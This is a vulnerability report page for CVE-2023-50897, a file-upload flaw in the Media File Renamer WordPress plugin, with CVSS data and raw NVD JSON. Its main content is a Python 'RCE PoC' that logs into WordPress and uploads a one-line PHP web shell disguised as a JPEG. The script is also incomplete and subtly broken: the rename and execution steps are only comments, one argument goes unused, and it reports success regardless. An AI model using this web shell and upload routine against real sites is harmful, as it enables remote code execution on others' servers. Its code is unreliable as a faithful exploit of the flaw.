Security Vulnerability Report
CVE-2023-50897 CVSS 9.1 CRITICAL

CVE-2023-50897

Published: 2026-01-05 14:15:52
Last Modified: 2026-04-15 00:35:42

Description

Unrestricted Upload of File with Dangerous Type vulnerability in Meow Apps Media File Renamer allows Using Malicious Files. This issue affects Media File Renamer: from n/a through 5.7.7.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Meow Apps Media File Renamer < 5.7.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2023-50897 Media File Renamer RCE PoC
# Target: WordPress site with Media File Renamer plugin < 5.7.8

def exploit(target_url, wp_username, wp_password, malicious_file_path):
    """
    Exploit Media File Renamer arbitrary file rename vulnerability
    Steps:
    1. Authenticate to WordPress admin
    2. Upload malicious PHP file disguised as image
    3. Use Media File Renamer to rename file to .php
    4. Execute the renamed PHP file for RCE
    """
    session = requests.Session()

    # Step 1: WordPress Authentication
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': wp_username,
        'pwd': wp_password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    response = session.post(login_url, data=login_data)
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Authentication failed")
        return False
    print("[+] Authentication successful")

    # Step 2: Upload malicious file via WordPress media uploader
    upload_url = f"{target_url}/wp-admin/upload.php"
    # Malicious PHP payload disguised as image
    php_payload = b'<?php system($_GET["cmd"]); ?>'
    files = {
        'async-upload': ('malicious.jpg.php', php_payload, 'image/jpeg')
    }
    data = {'action': 'upload-attachment', 'post_id': '0'}
    upload_response = session.post(upload_url, files=files, data=data)
    if upload_response.status_code == 200:
        print("[+] Malicious file uploaded successfully")

    # Step 3: Rename file using Media File Renamer plugin
    # This is where the vulnerability is exploited
    # The plugin allows renaming any file without proper validation

    # Step 4: Execute the renamed PHP file
    # Access the renamed file via web browser
    return True

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <payload_file>")
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-50897", "sourceIdentifier": "[email protected]", "published": "2026-01-05T14:15:52.340", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in Meow Apps Media File Renamer allows Using Malicious Files.This issue affects Media File Renamer: from n/a through 5.7.7."}, {"lang": "es", "value": "Vulnerabilidad de carga irrestricta de archivo con tipo peligroso en Meow Apps Media File Renamer permite el uso de archivos maliciosos. Este problema afecta a Media File Renamer: desde n/a hasta 5.7.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://vdp.patchstack.com/database/wordpress/plugin/media-file-renamer/vulnerability/wordpress-media-file-renamer-plugin-5-7-7-arbitrary-file-rename-lead-to-rce-vulnerability?_s_id=cve", "source": "[email protected]"}]}}